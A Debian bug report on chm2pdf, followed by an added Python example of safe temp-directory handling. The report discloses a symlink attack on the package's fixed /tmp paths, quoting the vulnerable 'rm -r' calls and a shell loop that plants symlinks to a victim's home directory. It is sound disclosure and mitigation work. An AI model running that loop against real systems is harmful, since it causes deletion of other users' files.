Thanks for the report

-Steve

On Oct 11, 2008, at 7:43 PM, Karol Lewandowski <[EMAIL PROTECTED]> wrote:

Package: chm2pdf
Version: 0.9-2
Severity: grave
Justification: causes non-serious data loss

There are several problems with this package:

1. chm2pdf creates /tmp/chm2pdf/{orig,work}/X directories
  (where X is the file basename, e.g. foo for foo.chm).

  This makes the script unusable for other users, i.e. userA runs chm2pdf,
  which creates /tmp/chm2pdf owned by userA; userB then has no chance to
  create files there.


2. A malicious user could prepare a directory structure which, upon chm2pdf
  execution, could cause serious data loss.

from /usr/bin/chm2pdf:

    CHM2PDF_TEMP_WORK_DIR='/tmp/chm2pdf/work'
    CHM2PDF_TEMP_ORIG_DIR='/tmp/chm2pdf/orig'
...
    CHM2PDF_WORK_DIR = CHM2PDF_TEMP_WORK_DIR + os.sep + basename
    CHM2PDF_ORIG_DIR = CHM2PDF_TEMP_ORIG_DIR + os.sep + basename
...
    os.system('rm -r '+CHM2PDF_ORIG_DIR+'/*')
    os.system('rm -r '+CHM2PDF_WORK_DIR+'/*')

A malicious user could do e.g.

malicious$ mkdir /tmp/chm2pdf/{orig,work}
malicious$ cd /tmp/chm2pdf/orig
malicious$ for f in `find /home/victim/ -iname \*.chm -print`; do
ln -s /home/victim/ `basename ${f%%.chm}`
done

and then ask user victim to convert any of his own .chm files.


Thanks.

-- System Information:
Debian Release: lenny/sid
 APT prefers testing
 APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27-rc7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages chm2pdf depends on:
ii  htmldoc         1.8.27-3      HTML processor that generates inde
ii  libchm-bin      2:0.39-9      library for dealing with Microsoft
ii  python          2.5.2-2       An interactive high-level object-o
ii  python-chm      0.8.4-0.1+b1  Python binding for CHMLIB
ii  python-support  0.8.4         automated rebuilding support for P

chm2pdf recommends no packages.

chm2pdf suggests no packages.

-- no debconf information
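Both problems in the report come from the fixed, world-shared /tmp/chm2pdf/{orig,work}/<basename> paths and from shelling out to 'rm -r' on them. The following is an added example, not chm2pdf's own code (function names are my own): each run gets a private mkdtemp() root, and cleanup refuses any path that is a symlink, not a directory, or not owned by the caller.

```python
"""Added example (not chm2pdf's code): per-invocation private temp
directories instead of fixed /tmp/chm2pdf/{orig,work}/<basename> paths,
plus an ownership/symlink check before anything is removed."""
import os
import shutil
import stat
import tempfile


def safe_private_dir(path):
    """True only if `path` is a real directory (not a symlink), owned by
    the current user, with mode 0700; False for anything else, including
    a path that does not exist."""
    try:
        st = os.lstat(path)  # lstat: never follow a symlink planted here
    except FileNotFoundError:
        return False
    if stat.S_ISLNK(st.st_mode) or not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != os.getuid():
        return False
    return stat.S_IMODE(st.st_mode) == 0o700


def make_work_dirs(basename):
    """Create fresh orig/work dirs under a unique, mode-0700 root created
    by mkdtemp(), so another user cannot pre-create or pre-populate them
    the way a fixed /tmp/chm2pdf/<basename> path allows."""
    root = tempfile.mkdtemp(prefix="chm2pdf-")
    orig = os.path.join(root, "orig", basename)
    work = os.path.join(root, "work", basename)
    os.makedirs(orig, mode=0o700)
    os.makedirs(work, mode=0o700)
    return root, orig, work


def cleanup(root):
    """Remove only our own private root, re-checked just before removal.
    shutil.rmtree is used instead of os.system('rm -r ' + path + '/*'),
    so there is no shell expansion and no following of a swapped symlink
    at the top level."""
    if not safe_private_dir(root):
        raise RuntimeError("refusing to remove %s: not our private dir" % root)
    shutil.rmtree(root)
    return not os.path.exists(root)
```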
